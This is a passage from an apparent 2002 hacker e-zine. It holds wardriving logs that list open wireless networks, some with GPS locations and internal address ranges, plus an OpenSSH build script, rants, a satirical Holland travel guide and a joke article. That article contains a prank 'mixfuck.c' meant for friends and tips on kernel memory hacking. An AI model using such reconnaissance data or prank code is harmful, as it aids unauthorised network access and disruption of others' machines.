Total : 3 First : "Sat Jun 22 21:29:22 2002" Last : "Sat Jun 22 21:39:26 2002" Network 119: "central" BSSID: "00:05:5D:DA:2B:50" Type : infrastructure Info : "None" Channel : 06 WEP : "No" Maxrate : 0.0 LLC : 2 Data : 1 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:29:26 2002" Last : "Sat Jun 22 21:29:26 2002" Network 120: "post" BSSID: "00:60:1D:F1:47:E0" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Total : 6 First : "Sat Jun 22 21:29:31 2002" Last : "Sat Jun 22 21:38:04 2002" Network 121: "post" BSSID: "00:60:1D:F1:48:01" Type : infrastructure Info : "None" Channel : 09 WEP : "No" Maxrate : 11.0 LLC : 16 Data : 0 Crypt : 0 Weak : 0 Total : 16 First : "Sat Jun 22 21:37:53 2002" Last : "Sat Jun 22 21:39:33 2002" Network 122: "post" BSSID: "00:60:1D:F0:E0:5E" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 20 Data : 0 Crypt : 0 Weak : 0 Total : 20 First : "Sat Jun 22 21:37:54 2002" Last : "Sat Jun 22 21:38:35 2002" Network 123: "" BSSID: "00:02:2D:0C:AE:06" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 4 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:39:30 2002" Last : "Sat Jun 22 21:39:40 2002" Network 124: "whitelink" BSSID: "00:06:25:60:B4:E3" Type : infrastructure Info : "None" Channel : 07 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:39:41 2002" Last : "Sat Jun 22 21:39:41 2002" Network 125: "" BSSID: "00:02:2D:05:B8:E4" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 4 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:41:04 2002" Last : "Sat Jun 22 21:41:09 2002" Network 126: "" BSSID: "00:02:2D:01:DA:1E" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 2 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:41:09 2002" Last : "Sat Jun 22 21:41:18 2002" Network 127: "default" BSSID: "00:90:47:00:01:8C" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:42:46 2002" Last : "Sat Jun 22 21:42:47 2002" Network 128: "linksys" BSSID: "00:04:5A:CC:39:74" Type : infrastructure Info : "None" Channel : 10 WEP : "No" Maxrate : 11.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Total : 6 First : "Sat Jun 22 21:42:51 2002" Last : "Sat Jun 22 21:42:55 2002" Network 129: "" BSSID: "00:02:2D:0C:B2:8E" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 2 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:43:06 2002" Last : "Sat Jun 22 21:43:06 2002" Network 130: "Apple Network 2e938b" BSSID: "00:02:2D:2E:93:8B" Type : infrastructure Info : "None" Channel : 01 WEP : "No" Maxrate : 0.0 LLC : 3019 Data : 0 Crypt : 0 Weak : 0 Total : 3019 First : "Sat Jun 22 21:43:23 2002" Last : "Sat Jun 22 21:47:00 2002" Network 131: "" BSSID: "00:40:96:33:DC:8F" Type : infrastructure Info : "WA9900PCHR9166" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:43:55 2002" Last : "Sat Jun 22 21:44:04 2002" Network 132: "Trizec_Hahn_dallas3" BSSID: "00:40:96:26:4C:E8" Type : infrastructure Info : "Park_Central" Channel : 01 WEP : "No" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:43:57 2002" Last : "Sat Jun 22 21:43:57 2002" Network 133: "Fryer Family" BSSID: "00:02:2D:09:46:DC" Type : infrastructure Info : "None" Channel : 01 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:44:27 2002" Last : "Sat Jun 22 21:44:27 2002" Network 134: "" BSSID: "00:02:2D:3C:AC:E4" Type : infrastructure Info : "None" Channel : 10 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Total : 1 First : "Sat Jun 22 21:45:26 2002" Last : "Sat Jun 22 21:45:26 2002" Network 135: "" BSSID: "00:02:2D:04:28:97" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 230 Crypt : 0 Weak : 0 Total : 230 First : "Sat Jun 22 21:45:54 2002" Last : "Sat Jun 22 21:46:59 2002" Network 136: "" BSSID: "00:E0:63:50:0C:31" Type : infrastructure Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:46:13 2002" Last : "Sat Jun 22 21:46:13 2002" Network 137: "" BSSID: "00:60:1D:1E:51:74" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 65 Crypt : 0 Weak : 0 Total : 65 First : "Sat Jun 22 21:46:31 2002" Last : "Sat Jun 22 21:46:59 2002" Network 138: "Trizec_Hahn_dallas2" BSSID: "00:40:96:30:47:A0" Type : infrastructure Info : "Galleria" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Total : 2 First : "Sat Jun 22 21:46:32 2002" Last : "Sat Jun 22 21:46:36 2002" Network 139: "" BSSID: "00:60:1D:1E:51:EF" Type : data Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 3 Crypt : 0 Weak : 0 Total : 3 First : "Sat Jun 22 21:46:46 2002" Last : "Sat Jun 22 21:47:00 2002" Network 140: "WLAN" BSSID: "00:04:E2:0E:6D:79" Type : infrastructure Info : "None" Channel : 11 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Total : 4 First : "Sat Jun 22 21:46:55 2002" Last : "Sat Jun 22 21:46:59 2002" -------------------------------------------------------------------------------- [Seattle Wardriving Data]=============================[pr00f ] -------------------------------------------------------------------------------- SSID MAC Address Chan WEP Address (Method) GPS Location (Est.) -------------------------------------------------------------------------------- RAINBOW 00:50:8B:99:2B:82 6 Y sadness 00:04:5A:D8:25:53 6 Y 47.6601 -122.3301 linksys 00:03:2F:03:16:55 6 Y 47.6597 -122.3290 linksys 00:04:5A:FD:B5:FB 6 Y 47.6598 -122.3316 linksys 00:04:5A:EB:9D:5D 6 Y linksys 00:04:5A:D2:67:55 6 N linksys 00:04:5A:CF:95:DB 6 N linksys 00:04:5A:2D:DD:1D 6 N 192.168.1.0 (UDP) 47.6592 -122.3338 linksys 00:04:5A:D2:14:6B 6 N 192.168.1.0 (UDP) linksys 00:06:25:53:23:EA 6 N 192.168.1.0 (UDP) 47.6608 -122.3337 celia 00:05:5D:ED:23:EC 9 N 192.168.2.0 (UDP) 47.6598 -122.3301 paul 00:02:2D:31:B6:8B 1 Y default 00:50:18:08:8D:A8 6 Y default 00:50:18:05:0C:22 6 N default 00:01:24:F0:33:55 6 N default 00:01:24:F1:6C:14 6 N default 00:30:AB:06:5D:CC N/A N default 00:10:E7:F5:12:CC 6 N 192.168.0.0 (UDP) 47.6609 -122.3298 default 00:50:18:06:82:1A 6 N 192.168.123.0 (UDP) willardx 00:04:5A:2E:3E:AD 6 N 10.0.0.0 (ARP) 47.6605 -122.3292 wireless 00:02:B3:A5:BD:54 10 N 192.168.2.0 (ARP) 47.6594 -122.3326 Wireless 00:30:AB:0C:36:17 1 N 47.6588 -122.3292 IEEE 00:90:96:21:99:25 6 N 10.134.216.0 (ARP) appledoorn00:02:2D:3C:DE:6B 1 N 47.6614 -122.3291 Bigfoot 00:30:65:1C:7B:6C 1 Y airport 1 00:02:2D:3F:55:C7 4 Y Airport 00:60:1D:F6:93:7D 1 Y 47.6603 -122.3337 Fourth 00:01:24:F0:1F:75 6 N Chris 00:02:2D:2A:18:E7 2 N WaveLAN 00:02:A5:6F:0E:96 10 N 10.0.0.0 (ARP) 47.6589 -122.3297 WaveLAN 00:02:A5:6E:0B:9E 10 N 10.0.0.0 (ARP) 47.6593 -122.3301 UniversityofWashington 00:60:1D:21:8B:7B 1 N 12.228.24.0 (ARP) 47.6607 -122.3315 airport 1 00:02:2D:3F:55:C7 4 Y 00:30:65:1C:AF:8C 1 Y 47.6583 -122.3303 nervenet 00:06:25:54:A3:18 6 N 47.6606 -122.3301 crack 00:40:96:15:63:EB 6 N linksys 00:06:25:04:96:91 6 N ANY 00:40:96:42:C5:42 6 N 47.6575 -122.3314 00:06:25:00:D8:AF N/A N 47.6599 -122.3301 CBCC 00:20:E0:8A:B0:36 N/A N 47.6610 -122.3336 tmobile 00:02:2D:38:85:0B N/A N tmobile 00:40:96:5A:9E:CB N/A N 47.6617 -122.3335 00:40:96:13:B2:A8 N/A N 207.229.104.0 (ARP) -------------------------------------------------------------------------------- [OpenSSH Update Script]============[Gridmark ] -------------------------------------------------------------------------------- #!/bin/bash #This updates openssh to the latest version, compiles it from the source #obtained from www.openssh.org since i have no leet version checking bash #skills you must know the current release version for this to work. its not #pretty but it should work. Soon i will recode this in C or perl so it #can be a bit more feature rich. #Tested on slack 8.1, by Gridmark TYPE=$2 echo "Usage $0 <1|2>" echo "Use 1 for Slackware(MD5), 2 for Debian/Mandrake/Redhat(PAM)" echo "i.e. '$0 3.4.p1 1' for openssh 3.4.p1 and slackware (or machine that uses md5 passwords)" if [ "$1" = "" ]; then exit 0 fi if [ "$2" = "" ]; then exit 0 fi #Compiler options if you wish to change them. COMPOPTSLACK=" --with-tcp-wrappers --with-md5-passwords --prefix=/usr --sysconfdir=/etc/ssh" COMPOPTDEB=" --with-tcp-wrappers --with-pam --prefix=/usr --sysconfdir=/etc/ssh" echo "Wgetting OpenSSH $1" wget -N -nv -nd --progress=bar:force --directory-prefix=openssh_$1 ftp://www.openssh.org/pub/OpenBSD/OpenSSH/portable/openssh-$1.tar.gz #unfortunately at this time i dont care enough to include md5 checksum verification. cd openssh_$1/ tar xzvf openssh-$1.tar.gz cd openssh-$1/ if [ "${TYPE}" = "1" ]; then echo "Making OpenSSH $1 for Slackware/MD5 supportive OS." ./configure ${COMPOPTSLACK} && make #&& su -c "make install" fi if [ "${TYPE}" = "2" ]; then echo "Making OpenSSH $1 for Pluggable Auth. Modules machine." ./configure ${COMPOPTDEB} && make #&& su -c "make install" fi echo "Compiliation/Install finished." -------------------------------------------------------------------------------- [Random Rants]===================================================[Random People] -------------------------------------------------------------------------------- /* Note: Opinions stated below are not entirely the views of the LoU. */ 1. Yahoo. Why can't they make a client right? Ever join a Yahoo! chat channel? Damn thing blows up when you are accepting other people's fonts... just give it a and watch their newest client die. Force YOUR font settings in the preferences to stop this. 2. P2P networks. Stop backdooring shit! gator.com sucks and so do you. Is it actually legal to trojan a windows box to force proxy settings so you can sniff what people browse? 3. OpenBSD. How many hours since remote hole in the default install? Forcing people to adopt your methods (i.e. PrivSep) will not help the industry, it will only hurt it. Do you think the commercial operating systems are going to change just because YOU say so? No. Get a clue. PrivSep is a good idea poorly implemented. 2500 lines of root owned code is still 2500 lines of overflowable code, and word on the street has it, PrivSep has already been defeated. Please discuss with full disclosure. 4. Hacker wars. Can't we all just get along? `Nuff said. 5. Worldcom. Oh geez, we knew you were clueless, but fixing the books too? And a 20 year old kid walking into your network? Whats that about? Guess next time a employee tells you that your security sucks a goat (1999) you will listen, instead of firing the guy trying to help you fix it. That firewall really did help you out this time, didn't it? 6. Hollings. Get rid of him. NOW. 7. Homeland security. Orwell! Hello! Does anyone care? Will you care when it's too late? Let's give up all our freedoms! Wheeeeeeee! 8. Bugtraq. Rest In Peace full disclosure. 9. Life sentences for hackers, hackers are terrorists. Spanish inquistion. Salem. United States 2002. Let the witch hunts begin. 10. RIAA/MPAA/BSA - No. Go away. You aren't smart enough to have as much money as you do. You don't deserve it. 11. Dot Com Boom - It didn't happen. Everyone lied. Greatest social engineering of all time. Please do it again.. lots of unemployed techies out there. 12. Airport security. Hey, I hide shit in my underware all the time. Oh yah, I got a *REAL* threat down there, baby. And nothing in my shoes cept my feet. BTW, how do you like all of your personal information being linked into ONE database so that the airline can determine if you are a threat or not? Thanks Larry! 13. Cisco. Build that great firewall! IOS 13 leaked yet? 14. Gobbles. Fresh voice, funny commentary, and kickin the fuq out of the industry. Please reproduce yourselves so that the clue increases across the industry. 15. Virus writers. We appreciate a good hack, but guys! Come on, these things don't exactly infect our UNIX boxen. 16. Setient. Ahh to be young, naive and completely annoying. 17. Bush. Hell yah, let's drill Alaska. We dont want to pay 10 bucks a gallon for gas when the war comes. 18. Sweedish girls. So sexy, so willing... so far away. :( 19. Gathering KV submissions is like pulling teeth. - Editor 20. All the people that could have written decent articles on any of the above subjects, but instead rather go whack off instead. ARG. See #19. -------------------------------------------------------------------------------- [Travel - Tips for Visiting Holland]=============[Rewben ] -------------------------------------------------------------------------------- 1. Never use the word "Dutch" in front of a Hollander. It reminds him too much of the word "Deutsch" which is a word for Germans and other things he doesn't like. A Dutchman is a Hollander or a Nederlander. 2. Never ever try to speak Hollands even if you have lived in Holland for more than five years. Not only will it give you a splitting headache but also Hollanders won't understand a single word of what you are trying to say. Foreigners are expected to speak English or gibberish. Speaking gibberish they are easy prey for pickpockets since they can't make a report to the police. 3. Also never try to eat "drop". Drop is a kind of licorice that only Hollanders can eat. It can be recognized by its colour: black. The taste is a cross between printer ink (blue) and earwax. Hollanders absolutely love it and eat kilos of the revolting stuff. There is a nationwide conspiracy to look at the faces of foreigners who are tricked into believing it is edible. 4. Do not buy wooden shoes. They will look absolutely silly on you. Which is ofcourse the main reason for selling them to you in the first place. A Hollander himself wouldn't like to be found dead in them. (As a matter of fact, they wouldn't like to be found dead at all) 5. Do not make holes in dikes. Behaviour like that is not only frowned upon but in certain cases can get you stoned to death with wooden shoes by an angry mob. You may feel free however to stick a finger in any dike you like. It'll get you a few good laughs from the natives. 6. A Hollander is always right and he knows it. With this in the back of your mind it is easy to deal with most of them. If ever you get into an argument with a Hollander, tell him that he is absolutely right and that you see the error of your ways. This will drive him absolutely crazy: Since you are a foreigner you can't be right. You agree with him. Therefore he also cannot be right. Impossible! He is a Hollander. But.. why.. he.. At this point you may want to stand back and watch him try to strangle himself with a tulip. 7. Windmills are unavoidable. 8. It is not necessary to show an interest in tulips, windmills, wooden shoes or cheese. Every Hollander knows that you came for the softdrugs or the Amsterdam red light district, the Walletjes. Both are available in a large quantity and are easy to find. Ask any Hollander age six or older or any French tourist (see items 19 & 20) 9. Avoid fans of soccer games at all cost. Soccer in Holland is merely an excuse used for bashing in the brains of just about everyone else, including yours, after the game is won. ...Or lost...Or if it is a draw. It is also very unwise to stand near a policeman during these festivities. (see item 10) Also, whenever there's a Hollander around: "Don't mention the '74 final!". You'll end up in an ongoing discussion about how well the Orange team played and how marvellous it is that a small country like Holland has such a good team and blah-de-blah-de-blah. 10. Policemen in Holland may be used for throwing things at. If you feel like hitting someone or something, use a policeman. No Hollander will pay any attention if you decide to hit, maim, or kick a policeman in the groin. Policemen represent authority and no Hollander recognizes any authority higher than himself. You may also note that a lot of Hollandse policemen are in fact foreigners tricked into taking the job. 11. Hollanders do not like to spend money, they'd sooner cut off their own ears. A Hollander will become a friend for life if you give him something for free. (Note: Social diseases are an exception) LOL This might explain the success of MacDonald's in Holland. The story that copper wire is an invention of two Hollanders fighting over a found cent is absolutely true. 12. Holland is small. There is a rumour that Holland is put inside during rainstorms. Not true, but that is mainly because it rains about 365 days each year. This might also explain those wooden shoes: They float. Yes, Holland is small and Hollanders are proud of it. They will grab every opportunity to point out to you that the nation has accomplished great things, despite of it being so small. A suitable answer to this swank is the Hollander's imperialistic past. Wich brings us -rather nicely- to item 13. 13. If you wish to insult a Hollander -and sooner or later you will - simply tell him you don't think he is a pacifist. Now immediately start running for your life. He'll want to prove to you that he is a peace loving person and he won't stop proving this until your intestines are scattered all over the floor. However, mentioning a supposedly imperialistic past considering Surinam and/or Indonesia, will instantly reduce a Hollander to a pathetic, sniffing and crying child, begging for forgiveness. 14. The Hollanders are supposed to be tolerant. They are not. They simply make too much money from the sale of soft- and hard-drugs, Malaysian women and pornography to foreigners to let an opportunity for making a good profit go by. 15. The main form of public transportation in Holland is bikes. Feel free to take any bike of which you are able to pick the lock. Don't expect your own bike however to be where you left it three minutes earlier. The hunting season for bikes is open 365 days a year. Have fun. 16. At nearly every meal in Holland you will find a small vicious looking blade with a slit in it. It is called a "kaasschaaf" and is used for taking very thin (the see-through kind) slices of the cheese. Yes, it is indeed an invention made by a Nederlander. Never cut cheese with a knife, you'll make an utter fool of yourself. Another peculiar dinner tool is the "flessenlikker", which literally means "bottle-licker", but which is best translated by "yoghurt-scraper". Note that this tool is not meant to get rid of an itchy back or for your nightly escapades. It's designed to clean out bottles of yoghurt or "vla" which is a sort of custard. The Nederlanders wants to use absolutely every millilitre of the yoghurt or 'vla' he bought. He paid for all of it and he'll jolly well eat all of it. 17. At the time of this writing, the Hollandse economy is doing quite well. The Hollanders say that this is the result of extensive negotiating between parties like the unions, the employers and the government. They even have a name for this: The polder model. Foreigners are made to believe that this polder model is the key to a healthy economy and if others should follow this polder model, their economy's will also improve dramatically. This is utter nonsense. Hollanders just love to talk and talk and talk. Calling all this talking negotiations only gives them a sense of doing something useful. Talk is not cheap in Holland. 18. Hollanders like to drown fried potato's in litres of mayonnaise and put it in small paper bags. This is called "een patatje met". One of these bags can sustain life over an indefinite period. Not everyone agrees if it is the sort of life worth living. Some foreigners however are reported to have actually liked eating it. 19. Hollanders have a special and unique service for -mainly- French tourists. As soon as they cross the border between Belgium and Holland, they are welcomed enthusiastically by young men in fast cars. These young people wish to point out to the French tourist where the more interesting touristy places in Holland can be found. Strangely enough they always seem to end up in a coffee shop (see item 20). Funny people those French. 20. There is a fast and guaranteed way of making a complete fool of yourself in Holland: Enter a coffee shop and ask for a cappuccino. Coffee shops do not -remember this- do not sell coffee. You can however get a good number of other stimulating drugs there. For some unknown reason coffee shops are extremely popular with French tourists. 21. A Fries is a semi-detached sort of Nederlander, living in the north of the country in a province all for himself. He is fond of frozen water, Beerenburg (which is a form of euthanasia with alcohol) and continuously pointing out to non-Fries Hollanders that they are -indeed- not Fries. The rest of the Hollanders look upon this behaviour with the good natured ambivalent feelings that parents have for an obstinate child. 22. On the matter of what books to buy before you come to Holland, I can recommend the following: The complete works of William Shakespeare or a leather-bound volume of the Encyclopaedia Britannica (the 1913 copy: Fr to He). In my experience these two books have just about the right weight for clubbing a pushy drug dealer or pimp on the head without leaving any marks. After hitting you might want to drop the book you were carrying at that moment for a more speedy retreat. Bring plenty of books. 23. Do not bother to hire a car. Not only can you steal more bikes than you will need but car-traffic in Holland is not something you will enjoy. In the rest of the world traffic jams are measured in miles or kilometres, Nederlandse traffic jams are measured in weeks. As a matter of fact, the more persistent traffic-jams are well worth a touristic visit. The sight of starving people in an expensive Mercedes can be quite uplifting if you are of a philosophic nature. You may want to bring some pieces of bread with you to throw through open car windows. The resulting fights can often be worth >watching. 24. Contrary to popular belief, you may not bring your mother-in- law to Holland for do-it-yourself euthanasia. Tourists are warned not to take these matters into their own hands. 25. Whether you are catholic, Muslim or worshipper of Urrrgl, god of all honest politicians, in Holland you are likely to run into a church, temple or oak-tree-and-virgin of your liking. Hollanders are supposed to be very tolerant of other believes, ways of life and religious convictions. They are not. The only reason for there being so many different churches, sects and cults is the fact that Hollanders disagree on just about anything. A Hollander is always right (see item 6) and anyone who thinks different than him can jolly well bugger off and start his own church. 26. Holland is a kingdom. It has no king but a queen and her husband is no king but a prince. The queen doesn't rule the country -well, not much anyway- but she is very good at opening bridges, roads and visiting other countries. She is also very decorative at state banquets. Her son, the crown prince, will be king as soon as she stops queening (nice word eh?). Now his wife won't be a queen but she will be a princess because Nederland is much too small for a king and a queen at the same time. On April the 30th its Queen's Day, which is not the birthday of the queen, but the birthday of princess Juliana the queen's mother (who used to be the queen). It is no wonder that more and more Nederlanders wish to make Holland a republic. Queen's Day, by the way, has nothing to do with royal festivities. It's just a Hollander's excuse to drink large quantities of alcohol. On Queen's Day Hollanders also sell garbage in the streets. 27. It might be wise to learn how to swim if you visit Holland. No, the dikes will hold, that is not the problem. The huge amount of ditches, moats, canals, rivers and brooks can however lead to mistakes. The shiny nice new asphalt road that you wish to drive your car on during a rainstorm, may in fact not be a road at all. 28. The Hollandse art. Most Nederlandse painters get to be famous only after they have died. That is a very sensible arrangement from the publics point of view. Not only do you get large quantities of paintings -a man has got to eat, right?- but it also makes a nice investment for art-lovers. The painters themselves do not share this view at all but are unable to do anything about it. In at least one case the frustration has led to self-mutilation involving an ear. 29. If one of your Hollandse friends invites you for a birthday party, prepare yourself for a unique experience. Unique, because it can only be compared to taking place on a wooden chair which has a sharp nail driven through the underside of the seat, and not being able to move for a month. More than one foreigner has been driven to the brink of insanity in just one evening. A Hollandse birthday party consists of sitting in a chair, talking to other Hollanders about your work, your car, foreigners and politics. You are expected to leave at 11 pm and you'll gladly do so. 30. Do not get sick in Nederland. Over the last ten years, the famous Hollandse healthcare has been privatised. These days some operations, like open heart surgery, have a waiting list of more than six months. The doctors don't think that is a problem, "More than half of our patients for open heart surgery never even show up anyway" they say. Some Nederlandse patients who have become desperate, move to a country like Mozambique, Iraq or Pakistan where healthcare is infinitely better. 31. Nederlanders leave their curtains open in the evening. This used to be so that the neighbours could always check if your family didn't gamble or drink alcohol. These days it is a precaution against junkies trying to steal the stereo from the family car, parked in front of the house. It has the fortunate side effect that you can watch Hollanders in their natural surroundings, in front of the television, watching soaps. 32. Holland has more cities than only Amsterdam. ike ..erm. ..Well, it has!! 33. Hollandse beer has made quite a reputation for itself over the years. Some people even drink it. Brewing is indeed one of the things Hollanders traditionaly do very well. Holland never used to be a country with anything more interesting to do than to drink oneself blind in new and interesting ways or make paintings. This made the beer industry very popular. Experts claim that once you have drank Hollandse beer like Heineken, Grolsch or Amstel, all other beers taste like the tapwater in a Rotterdam hotel. 34. Hollandse tapwater is safe to drink. This is quite remarkable considering that most drinking water comes from poluted rivers like the Rhine. Plans to improve the quality of the riverwater, so that fish like salmon will return to Hollandse rivers to spawn, can count on strong resistance from the Nederlanders. They don't like the idea of animals having sex in their drinking water. -------------------------------------------------------------------------------- [Sex and Geeks Do Not Mix]======================[Vecna ] -------------------------------------------------------------------------------- mmhh... articles for KV ... did anyone want one specific article ? vecna..digi did want one on sex with floppy drives hahahahaa :) G7, ok :) I should try to write it :) with new /dev/sexfd0 device driver :) this was the start! the big bang! make sex with a phisical device or a device driver is not difficult. sex could be see, if not as good kind of pleasure, or phisical phenomena from irrationals reciprocals sentiments such love, as a simple intersection from different kind of device, that produce some kind of sound and liquid. if we try to apply this concept over out frendly personal computer, we could not discovery any kind of sound producer than pc speacker and the hd/floppy head when change place and run. my latest study about incests, is the link between floppy drivers and prawn, if you follow this diagram: 1) prawn live over the sand 2) from the sand we could produce silicon 3) with the silicon we could produce transistors and micro processors and FLOPPY DRIVER! we could think that prawn can be victim of an illusion and make sex with our floppy driver, for try to do some kind of sexual reproduction. if not directly with the driver, the driver could be the place of love for a couple of prawn in love. 1st -> VISUAL <- take a look www.prawnography.com, is the firs porn site for prawn. 2nd -> AUDIO <- -- mix.c -- #include #include #include #include #include #include #include static int mfd; void set_mic_vol (int v) { if((ioctl(mfd, SOUND_MIXER_WRITE_MIC, &v)) == -1) { perror("ioctl: SOUND_MIXER_WRITE_MIC"); exit(-1); } } void set_mixer (int v) { if((ioctl(mfd, SOUND_MIXER_WRITE_VOLUME, &v)) == -1) { perror("ioctl: SOUND_MIXER_WRITE_VOLUME"); exit(-1); } } int get_mixer (void) { int v; if((ioctl(mfd, SOUND_MIXER_READ_VOLUME, &v)) == -1) { perror("ioctl: SOUND_MIXER_READ_VOLUME"); exit(-1); } printf("current_vol -> %d\n", v); return v; } int main(int ac, char **av) { initscr(); cbreak(); if ((mfd =open("/dev/mixer", O_RDWR)) == -1) { perror("open"); exit(1); } while (1) { int c, cv; cv =get_mixer(); c =getchar(); clear(); switch (c) { case '[': set_mixer(cv - 0x1); break; case ']': set_mixer(cv + 0x1); break; case 'm': set_mic_vol(0x0); break; case 'n': set_mic_vol(0xff); break; case 'i': printw(" --[ insert value: "); refresh(); scanf("%d", &cv); refresh(); set_mixer(cv); break; default: continue; } mvprintw(0, 0, "current volume: %d\r", cv); refresh(); } close(mfd); echo(); nocbreak(); endwin(); exit(0); } -- EOF -- this code is without any comment because the C is self explicant. a good program to give at the friends is another version of sw that always call our loved ioctl() :) -- mixfuck.c -- #include #include #include #include #include #include #include int main(int ac, char **av) { static int mfd; void *fuker; fuker =calloc(0xffffffff, sizeof(char)); if(fuker ==-1) { perror("malloc"); exit(1); } if ((mfd =open("/dev/mixer", O_RDWR)) == -1) { perror("open"); exit(1); } if((ioctl(mfd, SOUND_MIXER_WRITE_VOLUME, fuker)) ==-1) { perror("ioctl"); exit(1); } close(mfd); exit(0); } -- EOF -- with a little immagination, we can discern that this software produce a sound-like vibration that cause sexual excitation on all prawns on the range of 300 yards. 3rd -> CEREBRAL EXCITATION FOR NERD-LIKE PRAWN <- this code show how use vga.h include for linux system, this work could be run only without frame buffer, and show a mandelbrot fractal. for make a porting for framebuffer you should read gpg manual and star to encrypt all your email, THINK AT YOUR PRIVACY! THE PRIVACY IS THE LATEST OF OUR DIRICTS ON THE NET! for a correct use of gpg, you must set gpg.rc on your ~/.mutt directory, set on ~/.gnupg/options file the line: keyserver pgp.mit.edu or another keyserver retrivered by: host -l pgp.net | grep www (this for see keyserver of pgp.net network) and on the ~/.mutt/gpg.rc set pgp_sign_as=0x[your key id] set pgp_autosign=yes set pgp_verify_sig=yes this is the only way for the secure and private communication. SIGNING ANY PUBLIC EMAIL (unsigned email could be faked at will) ENCRYPT ANY PRIVATE EMAIL (encrypt only provate things could be the light for investigation!) this is mandelbrod/vga code: -- mandel.c -- #include #define XMIN -2.25 #define XMAX 2.75 #define YMIN -2.5 #define YMAX 2.5 #define XD (XMAX-XMIN) #define YD (YMAX-YMIN) /* * x+iy * x+iy * x+iy = xx-yy+2ixy * x + iy = * xxx - xyy + 2ixxy +ixxy - iyyy -2xyy = */ int main(void) { int x, y; vga_init(); vga_setmode(G640x480x16); for (y=0; y<480; y++) { for (x=0; x<640; x++) { // -1 < a < 2 // -1.5 < b < 1.4 double a=x/640.0*XD+XMIN, b=y/480.0*YD+YMIN; int n = 0; while (((a*a+b*b) < 10000) && (n < 1024)) { double c = 1 - a*a*a + 3*a*b*b; b = -3*a*a*b + b*b*b; a = c; n++; } n=1; if (a) n+=2; if (b) n+=4; vga_setcolor(n); vga_drawpixel(x,y); } } getchar(); vga_setmode(TEXT); return 0; } -- EOF -- this could help your prawn how viagra could help mans! 4th -> LAMER NUMERIC HACKING FOR HENANCE PRAWN REPRODUCTION write 31337 is old and simple, write 111101001101001 sound much better. also the prawn know it, the prawn want that any people with him transistors-children count on binary. for this self-realization and auto-prawn-god-declaration, the Edict 1st of the Coucil of high horny prawn have been declared that ANY HUMAN MUST LIVE UNDER BINARY NUMERIC FORMAT. for you, the prawn-god have been coded: -- prawn-god-code.c -- #include int main() { int num, res, b, i, pos=31; char str[sizeof(int)*8+1]; printf("\nInsert number: "); scanf("%d", &num); str[sizeof(int)*8]='\0'; for (i=0; i<(sizeof(int)*8); i++) { b=num%2; num = num >> 1; str[ sizeof(int)*8 - i -1] = b == 1 ? pos=(sizeof(int)*8-i-1),'1' : '0'; } printf("%s\n",str + pos); } -- EOF -- p.s. try to read at www.s0ftpj.org/tools/umpf.tar.gz, umpf is the new tool for transparent encryption, is not very stable, but on few time I think to release umpf-mp, for linux/solaris/*bsd/AIX, with new features such keyd auto-killing, secure deletation of old file, secure scattering of password on the memory, (www.s0ftpj.org check for "linux virtual memory tripping" and "rape memory for better dinner" two work about direct memory hacking - ptrace(2) sucks very good) DIRECT MEMORY HACKING ? the concept is simple, any process run on virtual space of memory, you at kernel level could read data not only on virtual space (allocated and pagined for each process) you can read directly also from the phisical memory. this can make you able to do a very nice hacks for read and write any process in memory. at any memory (ptrace(2) is limitated and lame :) under BFi E-zine was relased two article about this work, the code are explainde on english, try to search and run it!. that's all! good prawn reproduction over your best floppy, happy coding :) excuse me for the delirum :) vecna@insertcoint.net, thanks to tele/elv/pilo/ralph/vejeta for our old work on swiss :) make love ? not war. -------------------------------------------------------------------------------- [Hey, Big Brother]=================================[Yarddog ] -------------------------------------------------------------------------------- Microsoft has given us an idea of where they want to go with Windows XP and .Net Server. One of these ideas that they have is to permit only "approved" software can be installed on their operating system. This takes them to Palladium. In WindowsXP, Microsoft has given us the Windows Management Instrumentation (WMI). The WMI is to give the administrator the opportunity to remove common access points for execution of software. This should, in their opinion, increase security and privacy by limiting the execution of malicious code or unknown code. WindowsXP allows the administrator to define what is trusted code. This can be done automatically by policy based approaches. There are 3 elements to the policy approach. One, is to define the policy for domain using the editor. Two, is to download the policy to the machine. Three, the OS enforces the policy when software is run. This gives an administrator the ability to choose which software may run on the machine. Microsoft states that software restriction policies support the following four ways to identify software: Hash-A cryptographic fingerprint of the file; Certificate-A software publisher certificate used to digitally sign a file; Path-The local or universal naming convention (UNC) path of where the file is stored; and, the Zone-Internet Zone. The hash rule is important as it contains 